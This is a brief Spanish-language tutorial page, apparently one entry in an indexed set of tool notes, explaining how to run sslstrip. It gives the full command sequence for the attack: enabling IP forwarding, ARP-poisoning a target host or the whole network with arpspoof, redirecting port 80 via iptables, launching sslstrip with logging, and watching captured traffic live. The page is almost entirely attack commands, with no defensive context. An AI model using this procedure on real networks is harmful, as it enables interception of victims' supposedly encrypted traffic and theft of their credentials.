Volver al índice


sslstrip

Herramienta para engañar al usuario haciéndole pensar que se encuentra en un sitio de Internet con cifrado SSL [HTTPS], cuando en realidad todos los datos están siendo transmitidos en abierto [HTTP].

Configuración de reenvío de paquetes IP:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Envenenamiento ARP (paquete dsniff):

# arpspoof -i eth0 -t ip_victima ip_router

En caso de querer atacar toda la red, solo especificar la ip router:

# arpspoof -i eth0 ip_router

Redirección de puertos usando Iptables:

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 31715

Al reiniciar el ordenador se borrará la regla, si se quiere borrar al momento cambiar "-A" por un "-D" en el comando anterior.

Arrancar sslstrip y ponerlo a la escucha:

# sslstrip -k -f -l 31715 -w archivo.log

Visionar en tiempo real los paquetes capturados:

# tail -f archivo.log


Volver al índice